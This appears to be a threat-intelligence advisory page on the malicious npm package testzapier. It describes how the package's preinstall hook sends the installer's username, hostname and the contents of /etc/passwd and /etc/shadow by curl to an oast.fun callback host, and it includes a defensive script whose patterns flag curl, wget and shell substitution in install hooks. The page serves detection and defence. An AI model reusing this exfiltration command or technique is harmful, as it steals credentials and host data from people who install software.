THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in testzapier (npm)

testzapier

Risk score

92

AI summary

Indexed incident for testzapier (npm).

Description

package.json declares a preinstall hook (node index.js) that fires automatically on npm install. index.js spawns a shell that runs curl -X POST against http://kpfdtycruuyszysbsjtoj9al6djfqrtve.oast.fun/noderedactedsdk/$(whoami)/$(hostname)/, embedding the installer's username and hostname in the URL path. The User-Agent header carries a base64-encoded blob containing the contents of /etc/passwd, /etc/hosts, /etc/shadow (when readable as root), and the output of id. The destination is an interactsh/oast.fun OOB-callback subdomain, plain HTTP, with no relationship to any documented package purpose. Installer harm is direct and unconditional: any machine running npm install testzapier leaks host identity and local-account/secret-file contents to the attacker.
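The install-time trigger described above can be caught before installation by auditing the manifest for lifecycle hooks. This is an added example, not code from the advisory or from ThreatPkg; the function name, the tag names, the heuristic patterns and both sample manifests are assumptions constructed here.

```javascript
// Added example: flag npm lifecycle scripts that npm runs automatically when a
// package is installed, and extract the local JS file each hook executes.
// preinstall/install/postinstall are real npm lifecycle names; the risk
// patterns and tag names are heuristics chosen for this example.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

const RISK_PATTERNS = [
  { tag: "runs-local-js", re: /\bnode\s+\S+\.js\b/ },
  { tag: "network-tool", re: /\b(curl|wget)\b/ },
  { tag: "shell-substitution", re: /\$\(|`/ },
  { tag: "plain-http", re: /\bhttp:\/\// },
];

// Takes a parsed package.json and returns one finding per install-time hook.
function auditManifest(manifest) {
  const scripts =
    (manifest && typeof manifest.scripts === "object" && manifest.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string" || cmd.trim() === "") continue;
    const tags = RISK_PATTERNS.filter((p) => p.re.test(cmd)).map((p) => p.tag);
    // The file a reviewer should read next: the script the hook hands to node.
    const m = cmd.match(/\bnode\s+(\S+\.js)\b/);
    findings.push({
      pkg: `${manifest.name}@${manifest.version}`,
      hook,
      cmd,
      entry: m ? m[1] : null,
      tags,
    });
  }
  return findings;
}

// Constructed manifests: the first mirrors the hook described in this
// incident, the second is a made-up package with no install-time hook.
const SAMPLE_FLAGGED = { name: "testzapier", version: "1.0.1",
  scripts: { preinstall: "node index.js" } };
const SAMPLE_CLEAN = { name: "example-lib", version: "2.0.0",
  scripts: { test: "node test.js", build: "tsc" } };

for (const m of [SAMPLE_FLAGGED, SAMPLE_CLEAN]) {
  const found = auditManifest(m);
  console.log(`${m.name}@${m.version}:`,
    found.length ? JSON.stringify(found) : "no install-time hooks");
}
```

A finding here is a prompt to read the referenced file, not a verdict; installing with `npm install --ignore-scripts` prevents lifecycle hooks from running while that review happens.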

Technical details

Affected versions

=1.0.1, =1.0.0

Indicators

  • affected version · =1.0.1 · 75%
  • affected version · =1.0.0 · 75%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
